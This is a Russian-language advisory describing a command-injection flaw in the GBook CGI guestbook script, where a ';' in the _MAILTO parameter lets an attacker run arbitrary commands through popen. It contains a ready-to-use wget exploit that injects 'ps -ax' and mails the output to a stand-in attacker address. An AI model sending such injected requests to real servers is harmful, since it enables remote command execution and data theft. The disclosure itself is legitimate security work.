GBook CGI позволяет размещать на сайтах CGI форму для постов замечаний и сообщений в гостевую книгу. Эта CGI страдает от уязвимости, которая позволяет выполнить любую команду, используя параметр _MAILTO.

При использовании _MAILTO параметра, можно выполнять любую команду. Это происходит из-за неадекватных проверок, когда вызывается 'popen', чтобы выполнить команду почты. Если используется ';' в переменной _MAILTO, то ты можешь выполнять любую команду с помощью этого.

Эксплоит:
Этот эксплоит выполняет команду "ps -ax" и
отправляет результаты на attacker@example.com.

wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?
_MAILTO=oops;ps%20-ax|mail%20 attacker@example.com&
_POSTIT=yes&
_NEWONTOP=yes&
_SHOWEMAIL=yes&
_SHOWURL=yes&
_SHOWCOMMENT=yes&
_SHOWFROM=no&
_NAME=attacker&
_EMAIL= attacker@example.com&
_URL=http://www.example.com&
_COMMENT=fwe&
_FROM=few"

Запомни: команда wget должна быть полностью на одной линии.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии